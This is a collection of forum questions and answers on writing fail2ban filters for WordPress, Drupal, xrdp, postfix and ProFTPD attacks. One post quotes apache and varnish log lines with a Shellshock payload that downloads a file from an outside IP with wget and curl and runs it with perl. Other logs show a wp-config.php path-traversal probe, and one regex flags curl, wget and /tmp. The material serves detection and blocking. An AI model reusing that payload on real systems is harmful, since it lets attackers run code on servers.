i have added rule into fail2ban to reject all wp login attemps
failregex = ^[a-zA-Z0-9\.]+ <HOST> .*POST.*/wp-login\.php HTTP.*
i would like to add the parameter GET to all login attempt (for reject them also )
so far i tried this
failregex = ^[a-zA-Z0-9\.]+ <HOST> .*"(GET|POST).*/wp-login\.php HTTP.*
or
failregex = ^[a-zA-Z0-9\.]+ <HOST> .*(GET|POST).*/wp-login\.php HTTP.*
but this does not work for GET parameter i still see it in access.log
thx you very much to help me
Related
I am looking for a fail2ban regex (or two) to find the wp-admin and wp-login attemps on drupal sites.
The regex should find "drupal:" and "page not found" and ("wp-admin" or "wp-login")
the problem for me are the "and" conditions
The logfile entries:
Apr 7 10:59:23 webserver drupal: https://www.anywebsite.com|1617785962|page not found|123.456.789.112|https://www.anywebsite.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php|https://anywebsite.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php|0||wp-admin/admin-ajax.php
Apr 7 06:53:47 webserver drupal: https://www.anywebsite.com|1617771227|page not found|123.456.789.112|https://www.anywebsite.com/wp/wp-login.php||0||wp/wp-login.php
Here you go:
failregex = ^\s*\S+ drupal: [^|]*\|\d+\|(?:page not found)\|<ADDR>
replace <ADDR> with <HOST> for fail2ban versions before v.0.10
WARNING Note that this assumes that first URI in your log-line (site? referrer?) after drupal: never contains a pipe-character (so an intruder is unable to add it to URI somehow to avoid ban). Otherwise it becomes complex (you must anchor it from both sides or write some conditional REs with lookaheads or lookbehinds).
Also note that if your side can make some 404 for legitimate users (because missing some references etc), you have to add to the RE some precise pattern excluding your missing pages to avoid false positives, e. g. something like this (with blacklisting expressions):
_block_uris = wp-admin|(?:wp/)wp-login
failregex = ^\s*\S+ drupal: [^|]*\|\d+\|(?:page not found)\|<ADDR>\|\w+://[^/]+/(?:%(_block_uris)s)
or (with white-listing expressions, here ignoring /my-page/ and my-site/ URIs):
_ignore_uris = my-page/|my-side/
failregex = ^\s*\S+ drupal: [^|]*\|\d+\|(?:page not found)\|<ADDR>\|\w+://[^/]+/(?!%(_ignore_uris)s)
in order to configure fail2ban for xrdp attacks, i need some help with regexp.
In /var/log/xrdp.log i can see :
[20201229-12:24:42] [INFO ] Socket 12: AF_INET6 connection received from ::ffff:82.74.118.114 port 55267
So in jail.conf i add :
[rdp]
enabled = true
filter = rdp
action = iptables-multiport[name=rdp, port="3389,3390,3391", protocol=tcp]
logpath = /var/log/xrdp.log
maxretry = 5
And for the filter.d/rdp.conf i wrote :
[Definition]
failregex = connection received from ::ffff:<HOST> port
ignoreregex =
Obviously my regexp is bad...
Can someone help me ?
Thx
Your failregex is redundant because <HOST> is an alias for the pattern (?:::f{4,6}:)?(?P<host>\S+), which includes the ::ffff: part. Also the date format in your log isn't supported by the default date templates of fail2ban, so you must set a custom date pattern.
[Definition]
failregex = connection received from <HOST>
ignoreregex =
datepattern = %%Y%%m%%d-%%H:%%M:%%S
As a rule of thumb you should always test your date patterns and regex with the fail2ban-regex tool.
im getting mad!
i want to take make a rule to match the "5.7.1" from postfix the "reject body" string and then ban the ip. Here is the string from maillog.
Sep 10 08:04:57 server postfix/cleanup[11430]: 7793A80D7F97: reject: body Se non desiderate ricevere queste raccomandazioni: Rimuovere me - from cha129.probionicapps.com[188.208.198.129]; from= to= proto=ESMTP helo=: 5.7.1 Spam Succesfully Rejected - WE REFUSE SPAM AGENCIES - 004
i need a regex rule to get the ip and ban it. Thanks
You can add this regex to postfix.conf:
^.*\[<HOST>\].*\shelo=:\s5\.7\.1\s.*$
Verify it works as expected by running:
fail2ban-regex -v /var/log/mail.log "^.*\[<HOST>\].*\shelo=:\s5\.7\.1\s.*$"
or, if you save it to postfix.conf:
fail2ban-regex -v /var/log/mail.log /etc/fail2ban/filter.d/postfix.conf
Currently have a server with 2 IPs, one internal and one external with varnish on the external and an apache backend on the internal with fail2ban running pretty much as default.
Recently the website went down returning 503 errors and it turned out fail2ban had banned the varnish from talking to the apache backend vi the apache-noscript rule. I have since added an exclusion for the ip address so this will not get banned again, but ideally I would prefer it if the client was banned in future.
From the apache logs
SERVER_IP - - [14/Jan/2015:16:52:57 +0000] "GET /phppath/php HTTP/1.1" 404 438 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS! #";system(\"wget http://69.64.75.181/img.bin -O /tmp/s.pl;curl -O /tmp/s.pl http://69.64.75.181/img.bin;perl /tmp/s.pl;rm -rf s.pl*\");'"
From the varnish logs
CLIENT_IP - - [14/Jan/2015:16:52:57 +0000] "GET http://SERVER_IP/phppath/php HTTP/1.1" 404 226 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://69.64.75.181/img.bin -O /tmp/s.pl;curl -O /tmp/s.pl http://69.64.75.181/img.bin;perl /tmp/s.pl;rm -rf s.pl*");'"
Would it be okay to just replicate my apache-noscript defnition to use the varnishlogs, i.e.:
[apache-noscript]
enabled = true
port = http,https
filter = apache-noscript
logpath = /var/log/apache*/*error.log
maxretry = 2
to become
[varnish-noscript]
enabled = true
port = http,https
filter = apache-noscript
logpath = /var/log/varnish/varnishncsa.log
maxretry = 2
I have noticed the apache no script filter has has the following failregex
failregex = ^%(_apache_error_client)s (File does not exist|script not found or unable to stat): /\S*(\.php|\.asp|\.exe|\.pl)\s*$
^%(_apache_error_client)s script '/\S*(\.php|\.asp|\.exe|\.pl)\S*' not found or unable to stat\s*$
I guess the main question is will this still work for the varnishlog in the output above, if not what failregex would I need?
Many Thanks.
[EDIT] It turns out as a coincidence the noscript did the banning but not for the above log entries. Now to formulate a fail2ban regex for the above log entry.
Okay I've created a new jail with the following rule to catch the above:
failregex = ^<HOST>.*\[[^]]+\].*\".+\"\s[1-9][0-9][0-9]\s[0-9]+\s\".*\"\s\".*(\/tmp|\/usr\/bin|curl\s+|\s*wget\s+|\.bin\s+).*\"$
Please feel free to suggest improvements to the rule to catch the log line mentioned above.
The fail regex works on both the apache access log and the varnish csa log.
I've configurated ProFTPD to log all authentifications on a Plesk powered server. This setting is not set by default since Plesk 10 (whyever...). I want to configure fail2ban, to detect unsuccessful login-attempts for Brute Force prevention.
/etc/proftpd.include:
ExtendedLog /var/log/proftpd/auth.log AUTH auth
LogFormat auth "%v [%h] %s"
Example of unsuccessfull login (530):
/var/log/proftpd/auth.log:
ProFTPD [12.89.47.3] 331
ProFTPD [12.89.47.3] 530
What's the correct regexp for fail2ban ? My configuration seems not to match the pattern:
/etc/fail2ban/filter.d/proftpd.conf:
failregex = ProFTPD(.)+\[<HOST>\] 530$
<HOST> seems to be a fail2ban variable, and $ ends up a rule (if you want to set several rules inside the failregex = variable).
For me the following is working on Plesk 10.4.
proftpd.include:
ExtendedLog /var/log/proftpd/auth.log AUTH auth
LogFormat auth "%v %t \"%r\" [%h] %s"
/etc/fail2ban/filter.d/proftpd.conf:
failregex = \[<HOST>\]\s+530$